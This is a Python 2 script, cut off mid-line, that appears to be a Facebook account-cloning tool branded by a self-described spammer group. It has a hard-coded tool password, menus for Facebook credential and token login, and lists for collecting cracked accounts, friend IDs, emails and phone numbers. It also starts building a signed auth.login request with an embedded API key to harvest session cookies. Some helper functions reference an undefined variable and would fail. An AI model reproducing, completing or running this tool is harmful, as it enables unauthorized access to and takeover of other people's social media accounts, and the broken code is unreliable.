#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To AKIL
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

def keluar():
	print "\x1b[1;91mExit"
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.001)

#### colours ####
B='\033[1;96m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
R='\033[1;94m'

##### LOGO #####
logo1 = """
\033[1;93m 
Ariyan
          Khan 
                   ALIF

\033[1;91m--> GITHUB :- ARIYAN-MAC
\033[1;92m--> FACEBOOK   :- the.criminal.of.gamer
\033[1;91m--> WE ARE SPAMMERS🔥😈 AND SYSTEM MAKERS👑👽
\033[1;95m--> TAKE LOVE 🖤   🖤 FROM VAI BROTHER'S POWER

"""

def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;91mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """

\033[1;95m   
VAI BROTHERS POWER
\033[1;91m 
ARIYAN KHAN ALIF
\033[1;92m 
THE KING OF VIRTUAL OKH
\033[1;93m

\033[1;91m--> GITHUB        :- ARIYAN-MAX  
\033[1;92m--> FB GROUP   :- VAI BROTHER'S POWER
\033[1;93m:) TAKE LOVE FROM🖤 VAI BROTHER'S POWER
\033[1;95m-->  
VAI BROTHERS POWER


"""

CorrectUsername = "Ariyan"
CorrectPassword = "Vbp"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;97m\x1b[1;97mTool Username \x1b[1;97m------- \x1b[1;97m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;97m\x1b[1;97mTool Password  \x1b[1;97m------- \x1b[1;97m")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #Dev:Ijaz
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;91mWrong Password"
            os.system('xdg-open https://www.facebook.com/groups/vai brother.s power/?ref=share')
    else:
        print "\033[1;91mWrong Username"
        os.system('xdg-open https://www.facebook.com/groups/vai brother.s power/?ref=share')

##### LICENSE #####
#=================#
def lisensi():
	os.system('clear')
	login()
	####login#########
def login():
	os.system('clear')
	print logo1
	print "1.\x1b[1;95mLogin  Facebook  "
        time.sleep(0.05)
        print "2.\x1b[1;92mDownload Get Access Token App Free"
        time.sleep(0.05)
        print "3.\x1b[1;95mLogin Using Token"
        time.sleep(0.05)
	print "0.\033[1;95mExit           "
	pilih_login()
	
def pilih_login():
	peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_login()
	elif peak =="1":
		login1()
        elif peak =="2":
	        os.system('xdg-open https://www.facebook.com/groups/vai brother.s power/?ref=share')
	        login()
	elif peak =="3":
	        tokenz()
	elif peak =="0":
		keluar()
        else:
		print"\033[1;91m[!] Wrong input"
		keluar()
		
def login1():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
                time.sleep(0.05)
		print logo1
		jalan('  \033[1;91mNote Do Not Use Your Personal Account' )
		jalan(' \033[1;92mCreate New Account For Login Safely' )
		print "\033[1;93mNew Commands Use It For Cloning"
		print('	' )
		id = raw_input('\x1b[1;94mFacebook Email/Pass : \x1b[1;92m')
		pwd = raw_input('\x1b[1;94mPassword  \x1b[1;94m')
		tik()
		try:
			br.open('https://m.facebook.com')
		except mechanize.URLError:
			print"\n\x1b[1;91mYou may Wrong or you have an internet issue"
			keluar()
		br._factory.is_html = True
		br.select_form(nr=0)
		br.form['email'] = id
		br.form['pass'] = pwd
		br.submit()
		url = br.geturl()
		if 'save-device' in url:
			try:
				sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'retu
